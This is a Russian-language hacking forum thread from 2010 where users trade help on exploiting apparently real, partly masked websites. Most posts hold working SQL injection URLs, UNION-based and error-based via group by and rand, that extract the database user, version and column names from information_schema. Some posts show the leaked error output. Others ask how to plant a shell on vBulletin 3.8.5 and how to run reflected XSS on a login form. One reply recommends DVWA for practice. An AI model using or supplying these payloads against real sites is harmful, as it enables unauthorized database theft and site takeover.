Старый 18.07.2010, 16:39   #91
Fepsis
 
Аватар для Fepsis
 
Регистрация: 05.07.2010
Сообщений: 55
Репутация: 9
По умолчанию

Багаж знаний по SQL-Injection не велик (пара статей) поэтому просьба - сильно не пинать..)

В общем определял количество полей через union+select+1,2... Скрипт убежал за значение 1000 так и не определив сколько в таблице полей... Попробовал альтернативные методы, и действительно "order by" и "group by" показали, что в таблице 4 поля...

Собственно сабж - как вывести из базы инфу, если union+select+1,2,3,4+--+ упорно твердит "The used SELECT statements have a different number of columns"

Код:
http://www.***.com/article.php?id=-1245+union+select+1,2,3,4+--+
К ответу желательно приложить урлы на соответствующие статьи..)

Последний раз редактировалось Twost; 14.05.2013 в 12:56..
Fepsis вне форума   Ответить с цитированием
Старый 18.07.2010, 16:51   #92
Ded MustD!e
Banned
 
Регистрация: 01.07.2010
Сообщений: 162
По умолчанию

Цитата:
Сообщение от Fepsis Посмотреть сообщение
Багаж знаний по SQL-Injection не велик (пара статей) поэтому просьба - сильно не пинать..)

В общем определял количество полей через union+select+1,2... Скрипт убежал за значение 1000 так и не определив сколько в таблице полей... Попробовал альтернативные методы, и действительно "order by" и "group by" показали, что в таблице 4 поля...

Собственно сабж - как вывести из базы инфу, если union+select+1,2,3,4+--+ упорно твердит "The used SELECT statements have a different number of columns"

Код:
http://www.***.com/article.php?id=-1245+union+select+1,2,3,4+--+
К ответу желательно приложить урлы на соответствующие статьи..)
когда присутствует вывод ошибок, можно выводить информацию через них:

Код:
http://www.***.com/article.php?id=1245+or+%28select%20count%28*%29+from+%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28mid%28%28select%20concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29%20from%20information_schema.columns%20limit%200,1%29,1,64%29,floor%28rand%280%29*2%29%29%29--
Duplicate entry 'outyourb_outyour@localhost:5.1.47-community-logutyourb_oyb1' for key 'group_key'

Почитать об этом можно тут:

https://rdot.org/forum/showthread.php?t=245

Последний раз редактировалось Twost; 14.05.2013 в 12:57..
Ded MustD!e вне форума   Ответить с цитированием
Старый 18.07.2010, 17:07   #93
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

Дело в том, что в скрипте минимум 3 запроса. Тоесть параметр попадает в 3 запроса к базе

1 в котором 4 поля видимо не имеет вывода (хотя я не особо смотрел)

2 мы увидим если продолжим подбирать order by
order by 22
order by 23
посмотри, они разные, и в итоге вывод:

http://www.***.com/article.php?id=-1245+UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22--+

3 Ну и третий в баннере наверху, вывод в свойствах картинки увидишь

http://www.***.com/article.php?id=-1245+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,0x2D3120756E696F6E2073656C65637420312C322C332C342 C352C362C372C382C76657273696F6E28292C31302C31312D2 D2B,22--+

Последний раз редактировалось Twost; 14.05.2013 в 12:57..
Jokester вне форума   Ответить с цитированием
Старый 19.07.2010, 13:53   #94
refresh
 
Регистрация: 18.07.2010
Сообщений: 9
Репутация: 0
По умолчанию

Может посчитаете офтопом, но думаю именно тут надо задать этот вопрос. Только начал разбираться в SQL inj. Хотел спросить совета по поводу тренировки: стоит ли использовать для этого проекты типа WEBGoa или Damn Vulnerable Web App? или лучше брать какую-нибудь старую и бажную версию движка и ковырять ее? И если у вас есть какие-нибудь дырявые скрипты буду только рад.
refresh вне форума   Ответить с цитированием
Старый 19.07.2010, 14:29   #95
nobody
 
Аватар для nobody
 
Регистрация: 05.07.2010
Сообщений: 176
Репутация: 130
По умолчанию

тебе сюда
насчет Damn Vulnerable Web App - да, довольно маленький но хорош для обучения
прелесть заключается в том что есть разные уровни сложности, и в зависимости от каждого, на любом левеле (xss/sql-inj/php-inj/csrf/etc) можно посмотреть сорцы этой уязвимой страницы со ответственно надо думать над кодом, а не тупо вставлять ковычки
nobody вне форума   Ответить с цитированием
Старый 20.07.2010, 14:32   #96
Dare
 
Аватар для Dare
 
Регистрация: 05.07.2010
Сообщений: 21
Репутация: 2
По умолчанию

Имеем:
Код:
http://***.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat%28version%28%29,rand%280%29|0%29+having+avg%280%29--+
С дальнейшим выводом затрудняюсь, подскажите в чем трабла?
Код:
http://***.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat%28%28select+column_name+from+information_schema.columns+limit+0,1%29,rand%280%29|0%29+having+avg%280%29--+
Зарание благодарен.
__________________
Продаю воздух

Последний раз редактировалось Twost; 14.05.2013 в 12:58..
Dare вне форума   Ответить с цитированием
Старый 20.07.2010, 15:14   #97
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

строку select-ом у меня получить не удалось, зато можно циферки:
Код:
http://***.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat((select+length(column_name)+from+information_schema.columns+limit+0,1),rand(0)|0)+having+avg(0)--+
=>
MySQL Error: 1062 (Duplicate entry '181' for key 1)
=> длина = 18

Код:
http://***.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat((select+ascii(mid(column_name,1,1))+from+information_schema.columns+limit+0,1),rand(0)|0)+having+avg(0)--+
=>
MySQL Error: 1062 (Duplicate entry '671' for key 1)
=>
первый символ = 67 = 'C'

Последний раз редактировалось Twost; 14.05.2013 в 12:58..
DrakonHaSh вне форума   Ответить с цитированием
Старый 20.07.2010, 15:18   #98
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

http://***.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat(mid ((select+column_name+from+information_schema.colum ns+limit+1,1),1,64),rand(0)|0)+having+avg(0)--+
либо
http://***.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat(mid ((select+group_concat(column_name)+from+informatio n_schema.columns),1,64),rand(0)|0)+having+avg(0)--+

Думаю дальнейшее понятно, раз уж вы конструируете такие запросы

DrakonHaSh
Ну можно и так , конечно

Последний раз редактировалось Twost; 14.05.2013 в 12:58..
Jokester вне форума   Ответить с цитированием
Старый 21.07.2010, 08:37   #99
Keltos
 
Аватар для Keltos
 
Регистрация: 05.07.2010
Сообщений: 17
Репутация: 3
По умолчанию

Подскажите как залить шелл на vBulletin 3.8.5.
Есть доступ к Панели модератора
Keltos вне форума   Ответить с цитированием
Старый 22.07.2010, 23:02   #100
life_glider
 
Аватар для life_glider
 
Регистрация: 06.07.2010
Сообщений: 43
Репутация: 17
По умолчанию

копаю движок:
PHP код:
    echo "
        <form method=post>
            <input type=hidden name=goto value='"
.$_SERVER['REQUEST_URI']."'>
            <p>Enter password: <input type=password name=password></p>
            <p><input type=submit value='Login'></p>
        </form>
    "

можно ли провести пассивную-xss атаку? как и в каких браузерах?
__________________
Вы все такие классные
life_glider вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot